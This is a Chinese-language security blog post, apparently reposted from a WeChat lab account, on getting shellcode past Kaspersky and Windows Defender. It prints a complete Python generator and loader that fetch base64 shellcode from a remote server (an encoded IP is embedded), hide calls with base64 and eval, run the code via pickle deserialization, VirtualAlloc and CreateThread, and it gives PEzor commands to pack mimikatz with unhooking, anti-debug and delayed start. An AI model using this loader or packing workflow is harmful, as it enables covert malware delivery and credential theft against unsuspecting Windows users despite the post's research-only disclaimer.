测试的时候,好像是都过了.
因为网上的demo已经报毒很多了,然后就想这修改一下.
主要思想
是运用了反序列化,分离shellcode,敏感函数base64加密eval()执行.
import tkinter as tkimport base64import ctypesimport urllib.requestimport codecsimport pickledef change():var=entry.get()b64=str(base64.b64encode(var.encode("utf-8")), "utf-8")print(str(b64))code = """import codecs,urllib.request,ctypescode = urllib.request.urlopen('http://vps的ip/code.txt').read()code = base64.b64decode(code)code =codecs.escape_decode(code)[0]code = bytearray(code)ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(code)), ctypes.c_int(0x3000), ctypes.c_int(0x40))buf = (ctypes.c_char * len(code)).from_buffer(code)string=b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KAogICAgICAgIGN0eXBlcy5jX3VpbnQ2NChwdHIpLCAKICAgICAgICBidWYsIAogICAgICAgIGN0eXBlcy5jX2ludChsZW4oY29kZSkpCiAgICAp'eval(str(base64.b64decode(string),'utf-8'))handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))"""class A(object):def __reduce__(self):return (exec, (code,))ret = pickle.dumps(A())ret_base64 = base64.b64encode(ret)print(ret_base64)if __name__ == '__main__':window = tk.Tk()window.title("免杀shellcode -雷石安全")window.geometry('300x60+200+300')entry = tk.Entry(window, width=40)entry.pack()button=tk.Button(window,text='生成',command=change).pack()window.mainloop()
第一步:
生成payload
第二步:
放如小框框中,点击生成,会出现两个值:
第一个值为base64后的需要分离的shellcode,放到服务器中
用python开一个小服务器(可以去访问看看,通没通).
第两个值,为我们反序列化后的代码,中间那一群绿绿的代码,都会在我们反序列化的时候自动执行.
加载器py:
import base64,pickleshellcode =b'gASV4gMAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFjDAwAACmltcG9ydCBjb2RlY3MsdXJsbGliLnJlcXVlc3QsY3R5cGVzCmNvZGUgPSB1cmxsaWIucmVxdWVzdC51cmxvcGVuKCdodHRwOi8vNDcuMTEyLjI0Mi43MC9jb2RlLnR4dCcpLnJlYWQoKQpjb2RlID0gYmFzZTY0LmI2NGRlY29kZShjb2RlKQpjb2RlID1jb2RlY3MuZXNjYXBlX2RlY29kZShjb2RlKVswXQpjb2RlID0gYnl0ZWFycmF5KGNvZGUpCgpjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0CgpwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludChsZW4oY29kZSkpLCBjdHlwZXMuY19pbnQoMHgzMDAwKSwgY3R5cGVzLmNfaW50KDB4NDApKQpidWYgPSAoY3R5cGVzLmNfY2hhciAqIGxlbihjb2RlKSkuZnJvbV9idWZmZXIoY29kZSkKICAgIApzdHJpbmc9YidZM1I1Y0dWekxuZHBibVJzYkM1clpYSnVaV3d6TWk1U2RHeE5iM1psVFdWdGIzSjVLQW9nSUNBZ0lDQWdJR04wZVhCbGN5NWpYM1ZwYm5RMk5DaHdkSElwTENBS0lDQWdJQ0FnSUNCaWRXWXNJQW9nSUNBZ0lDQWdJR04wZVhCbGN5NWpYMmx1ZENoc1pXNG9ZMjlrWlNrcENpQWdJQ0FwJwpldmFsKHN0cihiYXNlNjQuYjY0ZGVjb2RlKHN0cmluZyksJ3V0Zi04JykpCmhhbmRsZSA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuQ3JlYXRlVGhyZWFkKAogICAgICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICAgICAgY3R5cGVzLmNfaW50KDApLCAKICAgICAgICBjdHlwZXMuY191aW50NjQocHRyKSwgCiAgICAgICAgY3R5cGVzLmNfaW50KDApLCAKICAgICAgICBjdHlwZXMuY19pbnQoMCksIAogICAgICAgIGN0eXBlcy5wb2ludGVyKGN0eXBlcy5jX2ludCgwKSkKKQpjdHlwZXMud2luZGxsLmtlcm5lbDMyLldhaXRGb3JTaW5nbGVPYmplY3QoY3R5cGVzLmNfaW50KGhhbmRsZSksY3R5cGVzLmNfaW50KC0xKSkKlIWUUpQu'#pickle.loads(base64.b64decode(shellcode))strinq=b'cGlja2xlLmxvYWRzKGJhc2U2NC5iNjRkZWNvZGUoY29kZSkp'eval(str(base64.b64decode(strinq),'utf-8'))
带进去生成的第二个值
直接运行,或者
pyinstaller -F loader.py --noconsole -i 13.ico生成exe(内部pyc)文件,当然脚本把它反编译出来pyc,然后查看源码(https://tool.lu/pyc/)不错的网址.
补充
这些显示不够,比如猕猴桃怎么免杀呢?
推荐一个在红队学院星球看到的项目(当然这个可以在,去特征字符串以后再次加固)
PEzor
git clone https://github.com/phra/PEzor.gitcd PEzorsudo bash install.shbash PEzor.sh –h
安装完会报错
下载https://github.com/EgeBalci/sgn,解压后放入PEzor的目录
然后
export PATH=$PATH:~/go/bin/:/root/dvwa/PEzor:/root/dvwa/PEzor/deps/donut_v0.9.3/:/root/dvwa/PEzor/deps/wclang/_prefix_PEzor_/bin/注意:/home/dvwa/PEzor,要是自己的路径
而且此命令只在当前shell下有效
输入后便可以愉快的玩耍了.
比如,休眠120秒上线的mimikatz
PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz.exe -z 2end
本文始发于微信公众号(雷石安全实验室):测试免杀过卡巴斯基和window defender
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论